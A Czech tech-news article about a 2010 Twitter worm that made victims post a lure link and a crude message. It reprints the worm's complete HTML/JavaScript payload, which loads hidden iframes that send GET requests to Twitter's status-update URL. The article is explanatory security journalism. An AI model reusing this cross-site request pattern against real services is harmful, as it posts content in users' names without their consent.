Další exploit: kozy zaútočily na Twitter

Pár dní po prvním „útoku“ na Twitter zažila oblíbená sociální síť další. Tentokrát nebyl tak sofistikovaný a spíše než potenciální chyby v samotném Twitteru využíval prostých vlastností jazyka HTML a DOM API.

Možná jste si všimli, že vaši přátelé znenadání začali psát zprávičky s tímto obsahem:

„I love anal sex with goats“

Pro neznalé angličtiny:

„Mám rád anální sex s kozami“

Ještě předtím se ovšem na jejich profilu objevil tento tweet:

„WTF: http://t.co/smbuvNd

Každý, kdo na takový odkaz klepnul, se přesunul na zdánlivě prázdnou stránku, ve skutečnosti se na ní ale zpracoval Javascript. Ten vytvořil neviditelný prvek IFRAME (vložená cizí stránka uvnitř další stránky) a v tomto rámci načetl adresu http://twitter.com/share/update?status=. Jakýkoliv text za rovnítkem se pak pomocí HTTP GET metody poslal přímo na Twitter jako zcela běžná zprávička.

Klepněte pro větší obrázek
A takto se choval twitterový červ v praxi

Kód celkem vytvořil dva prvky IFRAME. V tom prvním se nejprve odeslal odkaz s „WTF“, abyste nalákali další potenciální oběti, v tom druhém pak informace o vaší sexuální preferenci.

Celý kód, který se zpracoval na záškodnické stránce:

<html>
<head></head>
<body>
<script>
var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "
http://twitter.com/share/update?status=WTF: " + window.location;
el2.src = "
http://twitter.com/share/update?status=I love anal sex with goats";
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);
</script>
</body>
</html>

Tento případ nezneužíval nějaké podstatnější chyby v Twitteru – pouze té vlastnosti, že Twitter uměl poslat zprávičku i přes HTTP GET požadavek. Jak se zdá, nyní to už není možné, pokud totiž GET požadavek upravíte a v prohlížeči navštívíte celou adresu, Twitter ohlásí neexistujícího uživatele share. Ani tentokrát nezpůsobil „virus“ nic vážného, pouze na pár jedinců (netušíme kolik) prozradil, co neměl.

Témata článku: Technologie, Web, Bezpečnost, Sociální sítě, Twitter, Status, Hidden, Love, Head

11 komentářů

Nejnovější komentáře

  • Feodaron 27. 9. 2010 19:10:01
    Ony přístup nemají, ani ho nepotřebují. Jedná se tady pouze o zaslání...
  • Juggernaut 27. 9. 2010 16:08:18
    Omlouvám se za nedovtipnost, ale mohl by mi někdo vysvětlit, proč tenhle...
  • Radim Lipovčan 27. 9. 2010 8:47:50
    Zajímavý expolit, tak alespoň někteří se o sobě a jiných dozvěděli další...
Určitě si přečtěte

Kde nejlevněji uložit 1 TB dat: Srovnali jsme aktuální ceny cloudových úložišť

Kde nejlevněji uložit 1 TB dat: Srovnali jsme aktuální ceny cloudových úložišť

** Srovnali jsme známá cloudová úložiště podle toho, kolik měsíčně zaplatíte za 1TB ** Ceny se pohybují od dvou stovek až po tisíc korun ** Google umožní uložit až 30 TB dat

18.  3.  2017 | Stanislav Janů | 113

Pojďme programovat elektroniku: Meteostanice, která bude díky Sigfoxu posílat stav počasí třeba z vrcholu Sněžky

Pojďme programovat elektroniku: Meteostanice, která bude díky Sigfoxu posílat stav počasí třeba z vrcholu Sněžky

** Příští roky budou ve znamení internetu věcí ** Podívali jsme se podrobně na síť Sigfox ** Takhle s ní komunikují krabičky z celé Evropy

19.  3.  2017 | Jakub Čížek | 17

Obří Mechroboti jsou realitou, měří čtyři metry a mají hmotnost přes 1,5 tuny

Obří Mechroboti jsou realitou, měří čtyři metry a mají hmotnost přes 1,5 tuny

** Jihokorejská společnost Hankook Mirae Technology vyrábí obří Mechroboty ** Jsou určené pro ovládání člověkem uvnitř ** V prodeji se objeví koncem tohoto roku za 200 milionů korun

20.  3.  2017 | Karel Javůrek | 18

Google představil nový Android O. Na co se můžeme těšit?

Google představil nový Android O. Na co se můžeme těšit?

** Google vypustil vývojářskou verzi nového Androidu ** Přinese lepší notifikace nebo prodlouženou výdrž ** K uživatelům se dostane na podzim

Včera | Stanislav Janů | 48


Aktuální číslo časopisu Computer

Supertéma o počítačové bezpečnosti

AMD Ryzen přichází

Velké testy kinoprojektorů a levných sluchátek

Příslušenství do USB-C